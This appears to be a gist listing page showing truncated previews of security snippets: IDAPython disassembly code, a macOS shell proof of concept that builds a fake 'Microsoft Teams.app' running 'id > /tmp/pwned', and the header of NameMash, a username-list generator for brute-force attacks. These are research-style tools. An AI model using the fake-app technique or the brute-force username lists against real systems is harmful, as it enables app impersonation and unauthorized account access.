bigsnarfdude
April 7, 2026
| # this IDAPython code can be used to disassembly an instruction | |
| instruction = ida_ua.insn_t() | |
| idaapi.decode_insn(instruction, address) | |
| disassembly = f"{hex(instruction.ea)} {instruction.get_canon_mnem()} " | |
| for i, op in enumerate(instruction.ops): | |
| if op.type == ida_ua.o_void: | |
| continue | |
| if i > 0: | |
| disassembly += ", " | |
| if op.type == ida_ua.o_reg: |
| #!/bin/sh | |
| FAKE_APP="/tmp/Microsoft Teams.app" | |
| APPS="/Applications/" | |
| echo "[+] Preparing fake app..." | |
| osacompile -o "${FAKE_APP}" -e 'do shell script "id > /tmp/pwned"' | |
| echo "[+] Adjusting Info.plist..." | |
| /usr/libexec/PlistBuddy -c "Add :CFBundleIdentifier string" "${FAKE_APP}/Contents/Info.plist" |
| #!/usr/bin/env python3 | |
| ''' | |
| NameMash by superkojiman | |
| Generate a list of possible usernames from a person's first and last name. | |
| https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/ | |
| ''' |